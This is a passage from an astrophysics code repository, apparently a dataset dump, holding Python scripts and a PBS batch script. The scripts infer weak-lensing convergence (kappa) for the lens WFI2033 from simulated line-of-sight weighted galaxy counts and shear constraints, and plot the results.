q_zweight_file=float(line.split()[10])\n q_mass_file=float(line.split()[12])\n q_mass2_file=float(line.split()[14])\n q_mass2rms_file=float(line.split()[16])\n q_mass3_file=float(line.split()[18])\n q_mass3rms_file=float(line.split()[20])\n q_zoverr_file=float(line.split()[22])\n q_massoverr_file=float(line.split()[24])\n q_mass2overr_file=float(line.split()[26])\n q_mass3overr_file=float(line.split()[28])\n q_mass2overrrms_file=float(line.split()[30])\n q_mass3overrrms_file=float(line.split()[32])\n q_zmassoverr_file=float(line.split()[34])\n q_zmass2overr_file=float(line.split()[36])\n if (q_gal!=0) and ((q_gal_file < (q_gal - q_gal_lim)) or (q_gal_file > (q_gal + q_gal_lim))):\n ok=0\n #ok_galonly=0\n if (q_oneoverr!=0) and ((q_oneoverr_file < (q_oneoverr - q_oneoverr_lim)) or (q_oneoverr_file > (q_oneoverr + q_oneoverr_lim))):\n ok=0\n if (q_zweight!=0) and ((q_zweight_file < (q_zweight - q_zweight_lim)) or (q_zweight_file > (q_zweight + q_zweight_lim))):\n ok=0\n if (q_mass!=0) and ((q_mass_file < (q_mass - q_mass_lim)) or (q_mass_file > (q_mass + q_mass_lim))):\n ok=0\n if (q_mass2!=0) and ((q_mass2_file < (q_mass2 - q_mass2_lim)) or (q_mass2_file > (q_mass2 + q_mass2_lim))):\n ok=0\n if (q_mass2rms!=0) and ((q_mass2rms_file < (q_mass2rms - q_mass2rms_lim)) or (q_mass2rms_file > (q_mass2rms + q_mass2rms_lim))):\n ok=0\n if (q_mass3!=0) and ((q_mass3_file < (q_mass3 - q_mass3_lim)) or (q_mass3_file > (q_mass3 + q_mass3_lim))):\n ok=0\n if (q_mass3rms!=0) and ((q_mass3rms_file < (q_mass3rms - q_mass3rms_lim)) or (q_mass3rms_file > (q_mass3rms + q_mass3rms_lim))):\n ok=0\n if (q_zoverr!=0) and ((q_zoverr_file < (q_zoverr - q_zoverr_lim)) or (q_zoverr_file > (q_zoverr + q_zoverr_lim))):\n ok=0\n if (q_massoverr!=0) and ((q_massoverr_file < (q_massoverr - q_massoverr_lim)) or (q_massoverr_file > (q_massoverr + q_massoverr_lim))):\n ok=0\n if (q_mass2overr!=0) and ((q_mass2overr_file < (q_mass2overr - q_mass2overr_lim)) or (q_mass2overr_file > (q_mass2overr + q_mass2overr_lim))):\n ok=0\n if (q_mass3overr!=0) and ((q_mass3overr_file < (q_mass3overr - q_mass3overr_lim)) or (q_mass3overr_file > (q_mass3overr + q_mass3overr_lim))):\n ok=0\n if (q_mass2overrrms!=0) and ((q_mass2overrrms_file < (q_mass2overrrms - q_mass2overrrms_lim)) or (q_mass2overrrms_file > (q_mass2overrrms + q_mass2overrrms_lim))):\n ok=0\n if (q_mass3overrrms!=0) and ((q_mass3overrrms_file < (q_mass3overrrms - q_mass3overrrms_lim)) or (q_mass3overrrms_file > (q_mass3overrrms + q_mass3overrrms_lim))):\n ok=0\n if (q_zmassoverr!=0) and ((q_zmassoverr_file < (q_zmassoverr - q_zmassoverr_lim)) or (q_zmassoverr_file > (q_zmassoverr + q_zmassoverr_lim))):\n ok=0\n if (q_zmass2overr!=0) and ((q_zmass2overr_file < (q_zmass2overr - q_zmass2overr_lim)) or (q_zmass2overr_file > (q_zmass2overr + q_zmass2overr_lim))):\n ok=0\n for item in range(len(listname)):\n if (ID[75:80] in listname[item]) and (\"dat\" in listname[item]):\n kappafileend=listname[item]\n kappafile=\"/Volumes/G-RAIDStudio/simulations/lensing_simulations/\"+kappafileend\n #print ID[75:80],ID,kappafileend\n x=int(round((posx + 0.5*L_field)/L_pix - 0.5))\n y=int(round((posy + 0.5*L_field)/L_pix - 0.5))\n count=int(round((x-1)*4096+y-1))\n if (ok==1):\n with open(kappafile) as kfile:\n l=kfile.readlines()\n kappa=np.append(kappa,[float(l[count].split()[1])])\n\n\n#print \"kappa=\", kappa\nif len(kappa)==0:\n print \"No field satisfies the conditions.\"\nelse:\n print \"Number of kappa elements:\", len(kappa), \" ------ Plotting histogram...\"\n output=str(sys.argv[1])[0:len(str(sys.argv[1]))-4]\n for i in range(len(sys.argv)-1):\n if i>0:\n output=output+\"_\"+str(sys.argv[i+1])\n outputfile=output+\"_kappa.dat\"\n output=output+\".eps\"\n os.system(\"rm %s\" %outputfile)\n for i in range(len(kappa)):\n kout=open('%s' %outputfile,'a')\n kout.write('%s \\n' %kappa[i])\n kout.close()\n BINS=20\n plt.suptitle(r'%s'%output[141:len(output)-4], fontsize=13, y=0.998)\n #x = linspace(0,2,500)\n #plt.subplot(451)\n #n_q, bins_q, patches = plt.hist(q, histtype='step', color='b', label='W4sim', linewidth=0.5, normed=1, bins=BINS, range=[0, rangemax])\n plt.subplot(1,1,1)\n plt.hist(kappa, histtype='step', color='b', label='kappa w/ constr.', linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n #plt.hist(kappa_galonly, histtype='step', color='r', label='kappa w/ gal constr.', linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n #plt.hist(kappa_noconstr, histtype='step', color='g', label='kappa w/o constr.', linewidth=1, normed=1, bins=BINS, range=[-0.05, 0.2])\n #plt.hist(kappa_noconstr, histtype='step', color='b', label='kappa w/o constr.', linewidth=0.5, normed=1, bins=BINS, range=[0, rangemax])\n ax=plt.subplot(111)\n s = \"med=%.3f, std=%.3f, cnt=%d\" % (np.average(kappa),np.std(kappa),len(kappa))\n ax.text(0.55, 0.8, s, fontsize=10, color='b',transform=ax.transAxes)\n #text(0.5, 0.5,'matplotlib',horizontalalignment='center',verticalalignment='center',transform = ax.transAxes)\n #plt.xlabel(r'$\\zeta_{gal}$', fontsize=15)\n plt.ylabel(\"Normalized cnts\", fontsize=20)\n plt.tick_params(axis='x', labelsize=13)\n plt.tick_params(axis='y', labelsize=13)\n plt.setp(plt.xticks()[1], rotation=90)\n plt.legend(bbox_to_anchor=(0.55, 0.7), loc='center left', borderaxespad=0., fontsize=10)\n #plt.subplots_adjust(top=0.6)\n #plt.tight_layout()\n plt.savefig(output, dpi=500)\n #plt.show()\nprint(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n\n\n" }, { "alpha_fraction": 0.6843910813331604, "alphanum_fraction": 0.7821612358093262, "avg_line_length": 28.149999618530273, "blob_id": "e72b53f12f771ed67d6ea0c5f23725afd752e78e", "content_id": "40d49d69ad81c50e7243cd28fc0b84362b94bcf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 583, "license_type": "no_license", "max_line_length": 86, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim14.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log14s.out\n#PBS -e Log14s.err\n#PBS -N 14s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr mass2overrrms\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr mass2overrrms\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr mass2overrrms\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr mass2overrrms\n" }, { "alpha_fraction": 0.595751941204071, "alphanum_fraction": 0.6414938569068909, "avg_line_length": 69.7549819946289, "blob_id": "2532dad5e920df37da1387d4973ed78587e1d542", "content_id": "489ff07a8797420ca59cbd00ad571f381d58b942", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 49670, "license_type": "no_license", "max_line_length": 761, "num_lines": 702, "path": "/python/catalogue_utilities/obsolete/inferkappa_unbiasedwithshear.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu Feb 14 2018\n# Run as python /lfs08/rusucs/code/inferkappa_unbiasedwithshear.py WFI2033 -1.0 -1.0 nohandpicked fiducial 5 45 23 meds gal gamma oneoverr mass\n# when a single radius is used (not mixing different radii constraints) this code is faster than inferkappa_unbiasedwithshear45and120.py because it doesn't read the id column\n# the code currently works for maglim 23 (WFI2033)\n# Description of arguments: inferkappa_unbiasedwithshear.py lens radius maglim innermask sum/meds gal list_of_weight_constraints\n# weight1 should always be \"gal\", in order to use the galaxy counts when correcting the bias due to different LOS\n# the code is written such that, if shear is used as overdensity, it should be the second weight used (unless only one weight is used);\n\nimport sys\nimport os\nfrom os import system\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport time\n\nstart_time=time.time()\n\nlens = str(sys.argv[1])\nzinf = str(sys.argv[2])\nzsup = str(sys.argv[3])\nhandpicked = str(sys.argv[4])\nother = str(sys.argv[5]) # refers to an optional suffix for the shear constraint\ninnermask = str(sys.argv[6])\nradius = str(sys.argv[7])\nmag = str(sys.argv[8])\nmode = str(sys.argv[9])\nconjoined = len(sys.argv) - 10 # total number of arguments including code name, minus the number of ones that are not weights\n\nif handpicked == 'nohandpicked': handpickedstr = ''\nelse: handpickedstr = '_'+str(sys.argv[4])\n\nif conjoined == 1:\n weightin1 = str(sys.argv[10])\nif conjoined == 2:\n weightin1 = str(sys.argv[10])\n weightin2 = str(sys.argv[11])\nif conjoined == 3:\n weightin1 = str(sys.argv[10])\n weightin2 = str(sys.argv[11])\n weightin3 = str(sys.argv[12])\nif conjoined == 4:\n weightin1 = str(sys.argv[10])\n weightin2 = str(sys.argv[11])\n weightin3 = str(sys.argv[12])\n weightin4 = str(sys.argv[13])\n\nprint \"conjoined:\", conjoined\n#root = \"/lfs08/rusucs/%s/MSwghtratios/\" % lens\n#root = \"/mnt/scratch/rusucs/%s/MSwghtratios/\" % lens\nroot = \"/Volumes/LaCieSubaru/MSweights/\"\n#rootcode = \"/mnt/scratch/rusucs/code/\"\nrootcode = \"/Users/cerusu/GITHUB/zMstarPDF/python/catalogue_utilities/\"\n#rootout = \"/lfs08/rusucs/%s/MSkapparesults/\" % lens\nrootout = \"/Volumes/LaCieSubaru/kapparesults/\"\n#rootout = \"/mnt/scratch/rusucs/%s/kapparesults/\" % lens\n#weightsfile = np.loadtxt(root+'weightedcounts_%s_%s_%sinner%s_zgap%s_%s.cat' %(lens,mode,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\n#weightsfile = np.loadtxt(rootcode+'weightedcounts_%s_%s_%sinner%s_zgap%s_%s.cat' %(lens,mode,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nweightsfile = np.loadtxt('/Users/cerusu/Dropbox/Davis_work/code/%s/weightedcounts_%s_%s_%s_%sinner%s_zgap%s_%s.cat' %(lens,lens,mode,mag,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nlimsigma = 2 # sigma limits on either side of the assumed gaussians\nbin_stat = 2000\nmin_kappa = -0.10\nmax_kappa = 1\n\nincrement1 = 4 # refers to the E interval from Greene et al. 2014\nincrement2 = 10\nincrement3 = 4\nincrement4 = 2\n\n# define the shear constraints\nif lens == \"WFI2033\":\n if other == 'fiducial' and handpicked == 'nohandpicked' and float(zsup) < 0 and innermask == '5':\n constr_gamma = 0.154\n constrwidth_gamma_inf = 0.139\n constrwidth_gamma_sup = 0.169\n if other == 'chameleon' and handpicked == 'nohandpicked' and float(zsup) < 0 and innermask == '5':\n constr_gamma = 0.193\n constrwidth_gamma_inf = 0.178\n constrwidth_gamma_sup = 0.208\n if other == 'fiducial' and (handpicked == 'handpicked' or handpicked == 'removegrouphandpicked' or innermask == '15' or float(zsup) > 0):\n constr_gamma = 0.09\n constrwidth_gamma_inf = 0.075\n constrwidth_gamma_sup = 0.105\n if other == 'fiducial' and (handpicked == 'handpicked' or handpicked == 'removegrouphandpicked' or innermask == '15' or float(zsup) > 0):\n constr_gamma = 0.09\n constrwidth_gamma_inf = 0.075\n constrwidth_gamma_sup = 0.105\n filters = \"ugrizJHK\"\n print 'shear: ',constr_gamma\nif lens == \"J1206\":\n constr_gamma = 0.04\n constrwidth_gamma_inf = 0.03\n constrwidth_gamma_sup = 0.05\n\n# declare which weights to read\nif mag == \"23\" and radius == \"45\":\n measured_index = 0 # specifies the column index in weightsfile\n measured_index_inf = 1\n measured_index_sup = 2\nif mag == \"23\" and radius == \"120\":\n measured_index = 3\n measured_index_inf = 4\n measured_index_sup = 5\n\ndef declareweight(weightin):\n if weightin == \"gal\": weight_index = 4\n if weightin == \"z\": weight_index = 5\n if weightin == \"mass\": weight_index = 6\n if weightin == \"mass2\": weight_index = 7\n if weightin == \"mass3\": weight_index = 8\n if weightin == \"oneoverr\": weight_index = 9\n if weightin == \"zoverr\": weight_index = 10\n if weightin == \"massoverr\": weight_index = 11\n if weightin == \"mass2overr\": weight_index = 12\n if weightin == \"mass3overr\": weight_index = 13\n if weightin == \"mass2rms\": weight_index = 14\n if weightin == \"mass3rms\": weight_index = 15\n if weightin == \"mass2overrrms\": weight_index = 16\n if weightin == \"mass3overrrms\": weight_index = 17\n if weightin == \"flexion\": weight_index = 18\n if weightin == \"tidal\": weight_index = 19\n if weightin == \"SIS\": weight_index = 20\n if weightin == \"SIShalo\": weight_index = 21\n if weightin == \"gamma\": weight_index = None\n return weight_index\n\nif mag == \"23\":\n weight1_index = declareweight(weightin1)\nif conjoined >= 2:\n if mag == \"23\":\n weight2_index = declareweight(weightin2)\n if conjoined >= 3:\n if mag == \"23\":\n weight3_index = declareweight(weightin3)\n if conjoined == 4:\n if mag == \"23\":\n weight4_index = declareweight(weightin4)\n\n# read weight constraints\nconstr_gal_meds = weightsfile[measured_index][0]\nconstrwidth_gal_meds_inf = weightsfile[measured_index_inf][0]\nconstrwidth_gal_meds_sup = weightsfile[measured_index_sup][0]\n\nconstr_z_meds = weightsfile[measured_index][1]\nconstrwidth_z_meds_inf = weightsfile[measured_index_inf][1]\nconstrwidth_z_meds_sup = weightsfile[measured_index_sup][1]\n\nconstr_mass_meds = weightsfile[measured_index][2]\nconstrwidth_mass_meds_inf = weightsfile[measured_index_inf][2]\nconstrwidth_mass_meds_sup = weightsfile[measured_index_sup][2]\n\nconstr_mass2_meds = weightsfile[measured_index][3]\nconstrwidth_mass2_meds_inf = weightsfile[measured_index_inf][3]\nconstrwidth_mass2_meds_sup = weightsfile[measured_index_sup][3]\n\nconstr_mass3_meds = weightsfile[measured_index][4]\nconstrwidth_mass3_meds_inf = weightsfile[measured_index_inf][4]\nconstrwidth_mass3_meds_sup = weightsfile[measured_index_sup][4]\n\nconstr_oneoverr_meds = weightsfile[measured_index][5]\nconstrwidth_oneoverr_meds_inf = weightsfile[measured_index_inf][5]\nconstrwidth_oneoverr_meds_sup = weightsfile[measured_index_sup][5]\n\nconstr_zoverr_meds = weightsfile[measured_index][6]\nconstrwidth_zoverr_meds_inf = weightsfile[measured_index_inf][6]\nconstrwidth_zoverr_meds_sup = weightsfile[measured_index_sup][6]\n\nconstr_massoverr_meds = weightsfile[measured_index][7]\nconstrwidth_massoverr_meds_inf = weightsfile[measured_index_inf][7]\nconstrwidth_massoverr_meds_sup = weightsfile[measured_index_sup][7]\n\nconstr_mass2overr_meds = weightsfile[measured_index][8]\nconstrwidth_mass2overr_meds_inf = weightsfile[measured_index_inf][8]\nconstrwidth_mass2overr_meds_sup = weightsfile[measured_index_sup][8]\n\nconstr_mass3overr_meds = weightsfile[measured_index][9]\nconstrwidth_mass3overr_meds_inf = weightsfile[measured_index_inf][9]\nconstrwidth_mass3overr_meds_sup = weightsfile[measured_index_sup][9]\n\nconstr_mass2rms_meds = weightsfile[measured_index][10]\nconstrwidth_mass2rms_meds_inf = weightsfile[measured_index_inf][10]\nconstrwidth_mass2rms_meds_sup = weightsfile[measured_index_sup][10]\n\nconstr_mass3rms_meds = weightsfile[measured_index][11]\nconstrwidth_mass3rms_meds_inf = weightsfile[measured_index_inf][11]\nconstrwidth_mass3rms_meds_sup = weightsfile[measured_index_sup][11]\n\nconstr_mass2overrrms_meds = weightsfile[measured_index][12]\nconstrwidth_mass2overrrms_meds_inf = weightsfile[measured_index_inf][12]\nconstrwidth_mass2overrrms_meds_sup = weightsfile[measured_index_sup][12]\n\nconstr_mass3overrrms_meds = weightsfile[measured_index][13]\nconstrwidth_mass3overrrms_meds_inf = weightsfile[measured_index_inf][13]\nconstrwidth_mass3overrrms_meds_sup = weightsfile[measured_index_sup][13]\n\nconstr_flexion_meds = weightsfile[measured_index][14]\nconstrwidth_flexion_meds_inf = weightsfile[measured_index_inf][14]\nconstrwidth_flexion_meds_sup = weightsfile[measured_index_sup][14]\n\nconstr_tidal_meds = weightsfile[measured_index][15]\nconstrwidth_tidal_meds_inf = weightsfile[measured_index_inf][15]\nconstrwidth_tidal_meds_sup = weightsfile[measured_index_sup][15]\n\nconstr_SIS_meds = weightsfile[measured_index][16]\nconstrwidth_SIS_meds_inf = weightsfile[measured_index_inf][16]\nconstrwidth_SIS_meds_sup = weightsfile[measured_index_sup][16]\n\nconstr_SIShalo_meds = weightsfile[measured_index][17]\nconstrwidth_SIShalo_meds_inf = weightsfile[measured_index_inf][17]\nconstrwidth_SIShalo_meds_sup = weightsfile[measured_index_sup][17]\n\ndef declareweight(weightin):\n if weightin == \"gal\": constr_weight = constr_gal_meds; constrwidth_weight_inf = constrwidth_gal_meds_inf; constrwidth_weight_sup = constrwidth_gal_meds_sup\n if weightin == \"z\": constr_weight = constr_z_meds; constrwidth_weight_inf = constrwidth_z_meds_inf; constrwidth_weight_sup = constrwidth_z_meds_sup\n if weightin == \"mass\": constr_weight = constr_mass_meds; constrwidth_weight_inf = constrwidth_mass_meds_inf; constrwidth_weight_sup = constrwidth_mass_meds_sup\n if weightin == \"mass2\": constr_weight = constr_mass2_meds; constrwidth_weight_inf = constrwidth_mass2_meds_inf; constrwidth_weight_sup = constrwidth_mass2_meds_sup\n if weightin == \"mass3\": constr_weight = constr_mass3_meds; constrwidth_weight_inf = constrwidth_mass3_meds_inf; constrwidth_weight_sup = constrwidth_mass3_meds_sup\n if weightin == \"oneoverr\": constr_weight = constr_oneoverr_meds; constrwidth_weight_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight_sup = constrwidth_oneoverr_meds_sup\n if weightin == \"zoverr\": constr_weight = constr_zoverr_meds; constrwidth_weight_inf = constrwidth_zoverr_meds_inf; constrwidth_weight_sup = constrwidth_zoverr_meds_sup\n if weightin == \"massoverr\": constr_weight = constr_massoverr_meds; constrwidth_weight_inf = constrwidth_massoverr_meds_inf; constrwidth_weight_sup = constrwidth_massoverr_meds_sup\n if weightin == \"mass2overr\": constr_weight = constr_mass2overr_meds; constrwidth_weight_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight_sup = constrwidth_mass2overr_meds_sup\n if weightin == \"mass3overr\": constr_weight = constr_mass3overr_meds; constrwidth_weight_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight_sup = constrwidth_mass3overr_meds_sup\n if weightin == \"mass2rms\": constr_weight = constr_mass2rms_meds; constrwidth_weight_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight_sup = constrwidth_mass2rms_meds_sup\n if weightin == \"mass3rms\": constr_weight = constr_mass3rms_meds; constrwidth_weight_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight_sup = constrwidth_mass3rms_meds_sup\n if weightin == \"mass2overrrms\": constr_weight = constr_mass2overrrms_meds; constrwidth_weight_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight_sup = constrwidth_mass2overrrms_meds_sup\n if weightin == \"mass3overrrms\": constr_weight = constr_mass3overrrms_meds; constrwidth_weight_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight_sup = constrwidth_mass3overrrms_meds_sup\n if weightin == \"flexion\": constr_weight = constr_flexion_meds; constrwidth_weight_inf = constrwidth_flexion_meds_inf; constrwidth_weight_sup = constrwidth_flexion_meds_sup\n if weightin == \"tidal\": constr_weight = constr_tidal_meds; constrwidth_weight_inf = constrwidth_tidal_meds_inf; constrwidth_weight_sup = constrwidth_tidal_meds_sup\n if weightin == \"SIS\": constr_weight = constr_SIS_meds; constrwidth_weight_inf = constrwidth_SIS_meds_inf; constrwidth_weight_sup = constrwidth_SIS_meds_sup\n if weightin == \"SIShalo\": constr_weight = constr_SIShalo_meds; constrwidth_weight_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight_sup = constrwidth_SIShalo_meds_sup\n if weightin == \"gamma\": constr_weight = constr_gamma; constrwidth_weight_inf = constrwidth_gamma_inf; constrwidth_weight_sup = constrwidth_gamma_sup\n return constr_weight, constrwidth_weight_inf, constrwidth_weight_sup\n\nif conjoined == 4: constr_weight4, constrwidth_weight4_inf, constrwidth_weight4_sup = declareweight(weightin4)\nif (conjoined == 3) | (conjoined == 4): constr_weight3, constrwidth_weight3_inf, constrwidth_weight3_sup = declareweight(weightin3)\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4): constr_weight2, constrwidth_weight2_inf, constrwidth_weight2_sup = declareweight(weightin2)\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4): constr_weight1, constrwidth_weight1_inf, constrwidth_weight1_sup = declareweight(weightin1)\n\nprint \"Reading...\"\n\nif mode == \"sum\": str1 = \"sum\"\nif mode == \"meds\": str1 = \"med\"\n\nif conjoined == 4:\n output = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,weightin4,mag,radius,mode,increment1,increment2,increment3,increment4)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_%s_LOS_increments%s_%s_%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,weightin4,mag,radius,mode,increment1,increment2,increment3,increment4)\nif conjoined == 3:\n output = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,mag,radius,mode,increment1,increment2,increment3)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_LOS_increments%s_%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,mag,radius,mode,increment1,increment2,increment3)\nif conjoined == 2:\n output = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,mag,radius,mode,increment1,increment2)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_LOS_increments%s_%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,mag,radius,mode,increment1,increment2)\nif conjoined == 1:\n output = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_increments%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,mag,radius,mode,increment1)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_LOS_increments%s.cat' % (rootout,lens,innermask,handpickedstr,zinf,zsup,other,weightin1,mag,radius,mode,increment1)\n\nif conjoined == 1:\n ''' Here I only read the columns of interest, without kappa, for ugriz, in order to find the medians of their values over the whole MS.'''\n med1 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin1 != \"gamma\":\n weight1_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[weight1_index], unpack=True)\n if i == 0:\n weight1 = weight1_\n else:\n weight1 = np.append(weight1,weight1_)\n else:\n weight1_1_,weight1_2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[2,3], unpack=True)\n if i == 0:\n weight1_1 = weight1_1_\n weight1_2 = weight1_2_\n else:\n weight1_1 = np.append(weight1_1,weight1_1_)\n weight1_2 = np.append(weight1_2,weight1_2_)\n print j,i\n if weightin1 != \"gamma\":\n med1[j] = np.median(weight1)\n else:\n med1[j] = np.median(np.sqrt(weight1_1**2 + weight1_2**2))\n med_weight1 = np.mean(med1) # throughout the code I use med_weight1 when computing intervals, following Green et al. For this, weight1 should always refer to simple galaxy number counts\n if weightin1 == \"gamma\":\n constr_weight1 = constr_weight1 / med_weight1 # for gamma, measured shear divided by the median value of shear in MS; this turns it into an overdensity, like the other weights, so that it is meaningful to multiply by med_weight1\n constrwidth_weight1_inf = constrwidth_weight1_inf / med_weight1\n constrwidth_weight1_sup = constrwidth_weight1_sup / med_weight1\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))]) # absolute number, e.g. of galaxies within the lower width\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n \n ''' Here I read ugrizJHK, converting weighted counts into overdensities, and recording the kappa values only for overdensities satisfying the constraint. I consider the full range of the constraint.'''\n for j in range(8):\n for i in range(8):\n if weightin1 != \"gamma\":\n kappa_, weight1_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n else:\n kappa_, gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = gamma / med_weight1\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ] # convert overdensities into absolute counts\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n print j,i\n\nif conjoined == 2:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n else:\n weight1_,weight2_1_,weight2_2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[weight1_index,1,2], unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s.cat\" % (root,str1,filters,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index), unpack=True)\n weight1_ = weight1_ / 